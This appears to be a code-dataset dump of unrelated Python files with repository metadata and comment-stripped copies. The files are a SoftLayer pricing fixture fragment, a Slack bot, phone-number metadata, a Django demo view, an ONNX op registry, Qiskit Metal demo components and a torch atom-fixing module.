'capacity': 12, 'itemCategory': { 'categoryCode': 'reserved_capacity', 'id': 2060, 'name': 'Reserved Capacity', 'quantityLimit': 20, 'sortOrder': '' }, 'prices': [ { 'currentPriceFlag': '', 'hourlyRecurringFee': '.032', 'id': 217561, 'itemId': 12273, 'laborFee': '0', 'locationGroupId': '', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'setupFee': '0', 'sort': 0, 'tierMinimumThreshold': '', 'categories': [ { 'categoryCode': 'reserved_capacity', 'id': 2060, 'name': 'Reserved Capacity', 'quantityLimit': 20, 'sortOrder': '' } ] } ] } ] getItems_1_IPV6_ADDRESS = [ { 'id': 4097, 'keyName': '1_IPV6_ADDRESS', 'itemCategory': { 'categoryCode': 'pri_ipv6_addresses', 'id': 325, 'name': 'Primary IPv6 Addresses', 'quantityLimit': 0, 'sortOrder': 34 }, 'prices': [ { 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 17129, 'itemId': 4097, 'laborFee': '0', 'locationGroupId': '', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0, 'tierMinimumThreshold': '', 'categories': [ { 'categoryCode': 'pri_ipv6_addresses', 'id': 325, 'name': 'Primary IPv6 Addresses', 'quantityLimit': 0, 'sortOrder': 34 } ] } ] } ] getObject = { 'id': 200, 'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01'}}, 'sortOrder': 10}], 'accountRestrictedActivePresets': [], 'activePresets': [ { 'description': 'AC2.8x60x25', 'id': 861, 'isActive': '1', 'keyName': 'AC2_8X60X25', 'name': 'AC2.8x60x25', 'packageId': 835 }, { 'description': 'AC2.8x60x100', 'id': 863, 'isActive': '1', 'keyName': 'AC2_8X60X100', 'name': 'AC2.8x60x100', 'packageId': 835 }], "items": [{ "capacity": "56", "description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]", "bundleItems": [ { "capacity": "1200", "keyName": "1.2 TB Local Storage (Dedicated Host Capacity)", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "2_GPU_P100_DEDICATED", "hardwareGenericComponentModel": { "capacity": "16", "id": 849, "hardwareComponentType": { "id": 20, "keyName": "GPU" } }, "categories": [{ "categoryCode": "dedicated_host_ram" }, { "capacity": "2", "description": "2 x 2.0 GHz or higher Cores", "keyName": "GUEST_CORES_2", "attributes": [ { "id": 8261, "attributeTypeKeyName": "ORDER_SAVES_USAGE_FEES" } ], "itemCategory": { "categoryCode": "guest_core", "id": 80 }}] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, "setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }]}
true
true
f705b13cfc1cd5bcb7ec174f96d2acb2a724ac65
41
py
Python
lectures/code/mr_map.py
naskoch/python_course
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
[ "MIT" ]
4
2015-08-10T17:46:55.000Z
2020-04-18T21:09:03.000Z
lectures/code/mr_map.py
naskoch/python_course
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
[ "MIT" ]
null
null
null
lectures/code/mr_map.py
naskoch/python_course
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
[ "MIT" ]
2
2019-04-24T03:31:02.000Z
2019-05-13T07:36:06.000Z
f = lambda x: x + 1 map(f, [1, 2, 3, 4])
13.666667
20
0.439024
f = lambda x: x + 1 map(f, [1, 2, 3, 4])
true
true
f705b2b334785f83ba36f8f36add6d246c62f860
2,257
py
Python
slackbot_te/slackpi.py
wray/slack_em
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
[ "MIT" ]
null
null
null
slackbot_te/slackpi.py
wray/slack_em
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
[ "MIT" ]
null
null
null
slackbot_te/slackpi.py
wray/slack_em
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
[ "MIT" ]
null
null
null
import os import time from slackclient import SlackClient import bot_id # Instructor and student imports import wray.slacklib import joe.slacklib import chris.slacklib # constants try: AT_BOT = "<@" + bot_id.get_id() + ">" except TypeError: pass # instantiate client slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN')) def handle_command(command, channel): """ Receives commands directed at the bot and determines if they are valid commands. If so, then acts on the commands. If not, returns back what it needs for clarification. Need to determine an algorithm for student overloaded commands. """ response = wray.slacklib.handle_command(command) response += joe.slacklib.handle_command(command) response += chris.slacklib.handle_command(command) print("["+response+"]") if len(response) == 0: response = "Why thank you, I don't know what else to say." slack_client.api_call("chat.postMessage", channel=channel, text=response, as_user=True) def parse_slack_output(slack_rtm_output): """ The Slack Real Time Messaging API is an events firehose. this parsing function returns None unless a message is directed at the Bot, based on its ID. """ output_list = slack_rtm_output print(output_list) if output_list and len(output_list) > 0: for output in output_list: if output and 'text' in output and AT_BOT in output['text']: # return text after the @ mention, whitespace removed return output['text'].split(AT_BOT)[1].strip().lower(), \ output['channel'] return None, None if __name__ == "__main__": READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose if slack_client.rtm_connect(): print("StarterBot connected and running!") while True: command, channel = parse_slack_output(slack_client.rtm_read()) print(command,channel) if command and channel: handle_command(command, channel) time.sleep(READ_WEBSOCKET_DELAY) else: print("Connection failed. Invalid Slack token or bot ID?")
30.5
75
0.658839
import os import time from slackclient import SlackClient import bot_id import wray.slacklib import joe.slacklib import chris.slacklib try: AT_BOT = "<@" + bot_id.get_id() + ">" except TypeError: pass slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN')) def handle_command(command, channel): response = wray.slacklib.handle_command(command) response += joe.slacklib.handle_command(command) response += chris.slacklib.handle_command(command) print("["+response+"]") if len(response) == 0: response = "Why thank you, I don't know what else to say." slack_client.api_call("chat.postMessage", channel=channel, text=response, as_user=True) def parse_slack_output(slack_rtm_output): output_list = slack_rtm_output print(output_list) if output_list and len(output_list) > 0: for output in output_list: if output and 'text' in output and AT_BOT in output['text']: # return text after the @ mention, whitespace removed return output['text'].split(AT_BOT)[1].strip().lower(), \ output['channel'] return None, None if __name__ == "__main__": READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose if slack_client.rtm_connect(): print("StarterBot connected and running!") while True: command, channel = parse_slack_output(slack_client.rtm_read()) print(command,channel) if command and channel: handle_command(command, channel) time.sleep(READ_WEBSOCKET_DELAY) else: print("Connection failed. Invalid Slack token or bot ID?")
true
true
f705b48143f78825bb5ce93336c2b928cbc14651
2,601
py
Python
venv/Lib/site-packages/phonenumbers/data/region_PH.py
HarisHijazi/mojarnik-server
bee7266609cc0bca7cc6a4059086fc0ba7219a33
[ "MIT" ]
null
null
null
venv/Lib/site-packages/phonenumbers/data/region_PH.py
HarisHijazi/mojarnik-server
bee7266609cc0bca7cc6a4059086fc0ba7219a33
[ "MIT" ]
2
2021-06-22T01:34:18.000Z
2021-06-22T01:40:28.000Z
venv/Lib/site-packages/phonenumbers/data/region_PH.py
HarisHijazi/mojarnik-server
bee7266609cc0bca7cc6a4059086fc0ba7219a33
[ "MIT" ]
null
null
null
"""Auto-generated file, do not edit by hand. PH metadata""" from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata PHONE_METADATA_PH = PhoneMetadata(id='PH', country_code=63, international_prefix='00', general_desc=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}|(?:2|[89]\\d{4})\\d{5}|[2-8]\\d{8}|[28]\\d{7}', possible_length=(6, 8, 9, 10, 11, 12, 13), possible_length_local_only=(4, 5, 7)), fixed_line=PhoneNumberDesc(national_number_pattern='(?:(?:2[3-8]|3[2-68]|4[2-9]|5[2-6]|6[2-58]|7[24578])\\d{3}|88(?:22\\d\\d|42))\\d{4}|2\\d{5}(?:\\d{2})?|8[2-8]\\d{7}', example_number='21234567', possible_length=(6, 8, 9, 10), possible_length_local_only=(4, 5, 7)), mobile=PhoneNumberDesc(national_number_pattern='(?:8(?:1[37]|9[5-8])|9(?:0[5-9]|1[0-24-9]|[2357]\\d|4[2-9]|6[0-35-9]|8[189]|9[1-9]))\\d{7}', example_number='9051234567', possible_length=(10,)), toll_free=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}', example_number='180012345678', possible_length=(11, 12, 13)), national_prefix='0', national_prefix_for_parsing='0', number_format=[NumberFormat(pattern='(\\d)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d)(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{4})(\\d{4,6})', format='\\1 \\2', leading_digits_pattern=['3(?:23|39|46)|4(?:2[3-6]|[35]9|4[26]|76)|544|88[245]|(?:52|64|86)2', '3(?:230|397|461)|4(?:2(?:35|[46]4|51)|396|4(?:22|63)|59[347]|76[15])|5(?:221|446)|642[23]|8(?:622|8(?:[24]2|5[13]))'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{5})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['346|4(?:27|9[35])|883', '3469|4(?:279|9(?:30|56))|8834'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d)(\\d{4})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[3-7]|8[2-8]'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[89]'], national_prefix_formatting_rule='0\\1'), NumberFormat(pattern='(\\d{4})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['1']), NumberFormat(pattern='(\\d{4})(\\d{1,2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['1'])])
130.05
325
0.618608
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata PHONE_METADATA_PH = PhoneMetadata(id='PH', country_code=63, international_prefix='00', general_desc=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}|(?:2|[89]\\d{4})\\d{5}|[2-8]\\d{8}|[28]\\d{7}', possible_length=(6, 8, 9, 10, 11, 12, 13), possible_length_local_only=(4, 5, 7)), fixed_line=PhoneNumberDesc(national_number_pattern='(?:(?:2[3-8]|3[2-68]|4[2-9]|5[2-6]|6[2-58]|7[24578])\\d{3}|88(?:22\\d\\d|42))\\d{4}|2\\d{5}(?:\\d{2})?|8[2-8]\\d{7}', example_number='21234567', possible_length=(6, 8, 9, 10), possible_length_local_only=(4, 5, 7)), mobile=PhoneNumberDesc(national_number_pattern='(?:8(?:1[37]|9[5-8])|9(?:0[5-9]|1[0-24-9]|[2357]\\d|4[2-9]|6[0-35-9]|8[189]|9[1-9]))\\d{7}', example_number='9051234567', possible_length=(10,)), toll_free=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}', example_number='180012345678', possible_length=(11, 12, 13)), national_prefix='0', national_prefix_for_parsing='0', number_format=[NumberFormat(pattern='(\\d)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d)(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{4})(\\d{4,6})', format='\\1 \\2', leading_digits_pattern=['3(?:23|39|46)|4(?:2[3-6]|[35]9|4[26]|76)|544|88[245]|(?:52|64|86)2', '3(?:230|397|461)|4(?:2(?:35|[46]4|51)|396|4(?:22|63)|59[347]|76[15])|5(?:221|446)|642[23]|8(?:622|8(?:[24]2|5[13]))'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{5})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['346|4(?:27|9[35])|883', '3469|4(?:279|9(?:30|56))|8834'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d)(\\d{4})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[3-7]|8[2-8]'], national_prefix_formatting_rule='(0\\1)'), NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[89]'], national_prefix_formatting_rule='0\\1'), NumberFormat(pattern='(\\d{4})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['1']), NumberFormat(pattern='(\\d{4})(\\d{1,2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['1'])])
true
true
f705b5f35286918ebf4f6eb85dc49797c87f040f
2,375
py
Python
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
PacktPublishing/Django-3-Web-Development-Cookbook
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
[ "MIT" ]
159
2019-11-13T14:11:39.000Z
2022-03-24T05:47:10.000Z
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
PacktPublishing/Django-3-Web-Development-Cookbook
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
[ "MIT" ]
34
2019-11-06T08:32:48.000Z
2022-01-14T11:31:29.000Z
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
PacktPublishing/Django-3-Web-Development-Cookbook
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
[ "MIT" ]
103
2019-08-15T21:35:26.000Z
2022-03-20T05:29:11.000Z
# -*- coding: UTF-8 -*- from __future__ import unicode_literals from datetime import timedelta from django.conf import settings from django.contrib.auth.decorators import login_required from django.shortcuts import render from django.utils.timezone import now as tz_now @login_required def start_page(request): # dummy view to illustrate all custom template filters and tags obj = { "created": tz_now() - timedelta(days=3), "content": f""" <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p> <figure> <img src="{settings.STATIC_URL}site/img/logo.svg" alt="" /> <figcaption>Logo</figcaption> </figure> <p>Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?</p> """, "website": "https://docs.djangoproject.com/en/dev/howto/custom-template-tags/", "content_to_parse": u""" {% if request.user.is_authenticated %} Hello, {{ request.user.username }}! {% else %} Hello anonymous visitor! {% endif %} """, } return render(request, "index.html", { "object": obj, })
67.857143
880
0.722947
from __future__ import unicode_literals from datetime import timedelta from django.conf import settings from django.contrib.auth.decorators import login_required from django.shortcuts import render from django.utils.timezone import now as tz_now @login_required def start_page(request): obj = { "created": tz_now() - timedelta(days=3), "content": f""" <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p> <figure> <img src="{settings.STATIC_URL}site/img/logo.svg" alt="" /> <figcaption>Logo</figcaption> </figure> <p>Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?</p> """, "website": "https://docs.djangoproject.com/en/dev/howto/custom-template-tags/", "content_to_parse": u""" {% if request.user.is_authenticated %} Hello, {{ request.user.username }}! {% else %} Hello anonymous visitor! {% endif %} """, } return render(request, "index.html", { "object": obj, })
true
true
f705b6a65b0a1a3cce1c1b27d5be5e9b86cb5570
2,458
py
Python
python/athena/onnx/handler.py
sj1104/Het
81b7e9f0f593108db969fc46a1af3df74b825230
[ "Apache-2.0" ]
2
2021-12-05T07:11:04.000Z
2021-12-15T07:53:48.000Z
python/athena/onnx/handler.py
sj1104/Het
81b7e9f0f593108db969fc46a1af3df74b825230
[ "Apache-2.0" ]
null
null
null
python/athena/onnx/handler.py
sj1104/Het
81b7e9f0f593108db969fc46a1af3df74b825230
[ "Apache-2.0" ]
3
2021-04-01T22:39:13.000Z
2021-04-21T11:51:57.000Z
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT license. from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import collections import inspect from athena.onnx import constants class athena_op: _OPSETS = collections.OrderedDict() _MAPPING = None def __init__(self, name,onnx_op=None, domain=constants.ONNX_DOMAIN, **kwargs): if not isinstance(name, list): name = [name] self.name = name if not isinstance(onnx_op,list): onnx_op=[onnx_op]*len(name) self.onnx_op=onnx_op self.domain = domain self.kwargs = kwargs def __call__(self, func): opset = athena_op._OPSETS.get(self.domain) if not opset: opset = [] athena_op._OPSETS[self.domain] = opset for k, v in inspect.getmembers(func, inspect.ismethod): if k.startswith("version_"): version = int(k.replace("version_", "")) while version >= len(opset): opset.append({}) opset_dict = opset[version] for i,name in enumerate(self.name): opset_dict[name] = (v,self.onnx_op[i], self.kwargs) return func @staticmethod def get_opsets(): return athena_op._OPSETS @staticmethod def create_mapping(max_onnx_opset_version): mapping = {constants.ONNX_DOMAIN: max_onnx_opset_version} ops_mapping = {} for domain, opsets in athena_op.get_opsets().items(): for target_opset, op_map in enumerate(opsets): m = mapping.get(domain) if m: if target_opset <= m and op_map: ops_mapping.update(op_map) athena_op._MAPPING = ops_mapping return ops_mapping @staticmethod def find_effective_op(name): """Find the effective version of an op create_mapping. This is used if we need to compose ops from other ops where we'd need to find the op that is doing to be used in the final graph, for example there is a custom op that overrides a onnx op ... :param name: The operator name. """ map_info = athena_op._MAPPING.get(name) if map_info is None: return None return map_info
29.97561
92
0.6131
from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import collections import inspect from athena.onnx import constants class athena_op: _OPSETS = collections.OrderedDict() _MAPPING = None def __init__(self, name,onnx_op=None, domain=constants.ONNX_DOMAIN, **kwargs): if not isinstance(name, list): name = [name] self.name = name if not isinstance(onnx_op,list): onnx_op=[onnx_op]*len(name) self.onnx_op=onnx_op self.domain = domain self.kwargs = kwargs def __call__(self, func): opset = athena_op._OPSETS.get(self.domain) if not opset: opset = [] athena_op._OPSETS[self.domain] = opset for k, v in inspect.getmembers(func, inspect.ismethod): if k.startswith("version_"): version = int(k.replace("version_", "")) while version >= len(opset): opset.append({}) opset_dict = opset[version] for i,name in enumerate(self.name): opset_dict[name] = (v,self.onnx_op[i], self.kwargs) return func @staticmethod def get_opsets(): return athena_op._OPSETS @staticmethod def create_mapping(max_onnx_opset_version): mapping = {constants.ONNX_DOMAIN: max_onnx_opset_version} ops_mapping = {} for domain, opsets in athena_op.get_opsets().items(): for target_opset, op_map in enumerate(opsets): m = mapping.get(domain) if m: if target_opset <= m and op_map: ops_mapping.update(op_map) athena_op._MAPPING = ops_mapping return ops_mapping @staticmethod def find_effective_op(name): map_info = athena_op._MAPPING.get(name) if map_info is None: return None return map_info
true
true
f705b7c9ba1ebdfedca5661e5e709e360e52da9e
4,993
py
Python
tutorials/resources/my429_qcomponents.py
TomVethaak/qiskit-metal
0fd3049b16a2b28dc6890b696d67329a91da70b9
[ "Apache-2.0" ]
167
2021-03-17T20:35:17.000Z
2022-03-31T13:25:04.000Z
tutorials/resources/my429_qcomponents.py
TomVethaak/qiskit-metal
0fd3049b16a2b28dc6890b696d67329a91da70b9
[ "Apache-2.0" ]
307
2021-03-17T14:07:43.000Z
2022-03-23T14:22:20.000Z
tutorials/resources/my429_qcomponents.py
TomVethaak/qiskit-metal
0fd3049b16a2b28dc6890b696d67329a91da70b9
[ "Apache-2.0" ]
122
2021-03-17T14:21:24.000Z
2022-03-18T10:09:38.000Z
# -*- coding: utf-8 -*- # This code is part of Qiskit. # # (C) Copyright IBM 2017, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. from qiskit_metal import draw, Dict from qiskit_metal.qlibrary.core import QComponent class MyQComponent1(QComponent): """Demonstration1 - Straight segment with variable width/length""" ### def __init__() <- comes from QComponent ### Initiaizes base variables such as self.id, self.name and self.options ### Also launches the first execution of make() ### def rebuild() <- comes from QComponent ### Clear output from previous runs of make() (geom/pin/net) and re-runs it def make(self): """calculates the geometries of the QComponent""" rect = draw.rectangle(0.5, 0.1, 0, 0) #width, height, pos_x, pos_y # add_geometry() expects shapely, thus the use of drawn module above self.add_qgeometry('poly', {'my_polygon': rect}, layer=1, subtract=False) self.add_pin('in', rect.exterior.coords[:-3:-1], 0.1) #name, tangent, width class MyQComponent2(QComponent): """Demonstration2 - Straight segment with variable width/length""" # Your knobs to modify the cell behavior default_options = Dict(width='0.5mm', height='0.1mm', pos_x='0mm', pos_y='0mm', layer='1') """Default drawing options""" def make(self): """calculates the geometries of the QComponent""" p = self.parse_options( ) # short-handle alias for the options interpreter rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y) self.add_qgeometry('poly', {'my_polygon': rect}, layer=p.layer, subtract=False) self.add_pin('in', rect.exterior.coords[:-3:-1], p.height) class MyQComponent3(QComponent): """Demonstration2 - Straight segment with variable width/length""" default_options = Dict(width='0.5mm', height='0.1mm', pos_x='0mm', pos_y='0mm', layer='1') """Default drawing options""" # Name prefix of component + import of renderer-specific default_options component_metadata = Dict( short_name='Trace', _qgeometry_table_path='False', #wirebonds _qgeometry_table_poly='True', _qgeometry_table_junction='False') #gds imports and analysis inputs """Component metadata""" def make(self): """calculates the geometries of the QComponent""" p = self.parse_options() # short-handle alias. Options interpreter rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y) self.add_qgeometry('poly', {'my_polygon': rect}, layer=p.layer, subtract=False) self.add_pin('in', rect.exterior.coords[:-3:-1], p.height) class MyQComponent4(QComponent): """Demonstration3 - Straight segment with variable width/length""" default_options = Dict(width='0.5mm', height='0.1mm', gap='0.02mm', pos_x='0mm', pos_y='0mm', layer='1') """Default drawing options""" # Name prefix of component + import of renderer-specific default_options component_metadata = Dict( short_name='Trace', _qgeometry_table_path='True', #wirebonds _qgeometry_table_poly='False', _qgeometry_table_junction='False') #gds """Component metadata""" def make(self): """calculates the geometries of the QComponent""" p = self.parse_options() line = draw.LineString([(-p.width / 2, 0), (p.width / 2, 0)]) line = draw.translate(line, p.pos_x, p.pos_y) self.add_qgeometry('path', {'trace': line}, width=p.height, layer=p.layer, subtract=False) line2 = draw.LineString([((-p.width / 2) - 2 * p.gap, 0), ((p.width / 2) + 2 * p.gap, 0)]) line2 = draw.translate(line2, p.pos_x, p.pos_y) self.add_qgeometry('path', {'cut': line2}, width=p.height + 2 * p.gap, layer=p.layer, subtract=True) self.add_pin('in', line.coords[::-1], p.height, input_as_norm=True)
38.705426
81
0.567795
from qiskit_metal import draw, Dict from qiskit_metal.qlibrary.core import QComponent class MyQComponent1(QComponent): er='1') def make(self): p = self.parse_options( ) rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y) self.add_qgeometry('poly', {'my_polygon': rect}, layer=p.layer, subtract=False) self.add_pin('in', rect.exterior.coords[:-3:-1], p.height) class MyQComponent3(QComponent): default_options = Dict(width='0.5mm', height='0.1mm', pos_x='0mm', pos_y='0mm', layer='1') component_metadata = Dict( short_name='Trace', _qgeometry_table_path='False', _qgeometry_table_poly='True', _qgeometry_table_junction='False') def make(self): p = self.parse_options() rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y) self.add_qgeometry('poly', {'my_polygon': rect}, layer=p.layer, subtract=False) self.add_pin('in', rect.exterior.coords[:-3:-1], p.height) class MyQComponent4(QComponent): default_options = Dict(width='0.5mm', height='0.1mm', gap='0.02mm', pos_x='0mm', pos_y='0mm', layer='1') component_metadata = Dict( short_name='Trace', _qgeometry_table_path='True', _qgeometry_table_poly='False', _qgeometry_table_junction='False') def make(self): p = self.parse_options() line = draw.LineString([(-p.width / 2, 0), (p.width / 2, 0)]) line = draw.translate(line, p.pos_x, p.pos_y) self.add_qgeometry('path', {'trace': line}, width=p.height, layer=p.layer, subtract=False) line2 = draw.LineString([((-p.width / 2) - 2 * p.gap, 0), ((p.width / 2) + 2 * p.gap, 0)]) line2 = draw.translate(line2, p.pos_x, p.pos_y) self.add_qgeometry('path', {'cut': line2}, width=p.height + 2 * p.gap, layer=p.layer, subtract=True) self.add_pin('in', line.coords[::-1], p.height, input_as_norm=True)
true
true
f705b7eb5329fb67c4342d7f6f4f2089a9062d8f
1,324
py
Python
torchfes/colvar/fix.py
AkihideHayashi/torchfes1
83f01525e6071ffd7a884c8e108f9c25ba2b009b
[ "MIT" ]
null
null
null
torchfes/colvar/fix.py
AkihideHayashi/torchfes1
83f01525e6071ffd7a884c8e108f9c25ba2b009b
[ "MIT" ]
null
null
null
torchfes/colvar/fix.py
AkihideHayashi/torchfes1
83f01525e6071ffd7a884c8e108f9c25ba2b009b
[ "MIT" ]
null
null
null
import math from typing import Dict, Union, List import torch from torch import nn, Tensor from .. import properties as p def fix_msk(mol: Dict[str, Tensor], idx: Tensor): _, atm, dim = mol[p.pos].size() msk = torch.zeros([atm, dim], dtype=torch.bool, device=idx.device) msk[idx, :] = True return msk class Fix(nn.Module): idx: Tensor def __init__(self, idx: Union[Tensor, List[int]]): super().__init__() if isinstance(idx, list): idx = torch.tensor(idx) self.register_buffer('idx', idx) def forward(self, mol: Dict[str, Tensor]): out = mol.copy() msk = fix_msk(mol, self.idx)[None, :, :] if p.fix_msk not in out: out[p.fix_msk] = msk else: out[p.fix_msk] = out[p.fix_msk] | msk return out class FixGen(nn.Module): pbc: Tensor idx: Tensor def __init__(self, idx: Union[Tensor, List[int]], num_dim: int): super().__init__() if isinstance(idx, list): idx = torch.tensor(idx, dtype=torch.long) n = idx.numel() * num_dim self.register_buffer('idx', idx) self.register_buffer('pbc', torch.ones(n) * math.inf) def forward(self, mol: Dict[str, Tensor]): msk = fix_msk(mol, self.idx) return mol[p.pos][:, msk]
27.020408
70
0.586858
import math from typing import Dict, Union, List import torch from torch import nn, Tensor from .. import properties as p def fix_msk(mol: Dict[str, Tensor], idx: Tensor): _, atm, dim = mol[p.pos].size() msk = torch.zeros([atm, dim], dtype=torch.bool, device=idx.device) msk[idx, :] = True return msk class Fix(nn.Module): idx: Tensor def __init__(self, idx: Union[Tensor, List[int]]): super().__init__() if isinstance(idx, list): idx = torch.tensor(idx) self.register_buffer('idx', idx) def forward(self, mol: Dict[str, Tensor]): out = mol.copy() msk = fix_msk(mol, self.idx)[None, :, :] if p.fix_msk not in out: out[p.fix_msk] = msk else: out[p.fix_msk] = out[p.fix_msk] | msk return out class FixGen(nn.Module): pbc: Tensor idx: Tensor def __init__(self, idx: Union[Tensor, List[int]], num_dim: int): super().__init__() if isinstance(idx, list): idx = torch.tensor(idx, dtype=torch.long) n = idx.numel() * num_dim self.register_buffer('idx', idx) self.register_buffer('pbc', torch.ones(n) * math.inf) def forward(self, mol: Dict[str, Tensor]): msk = fix_msk(mol, self.idx) return mol[p.pos][:, msk]
true
true
f705b8a080b3d7d64d5acef4a26a5ac0ae6a0be5
675
py
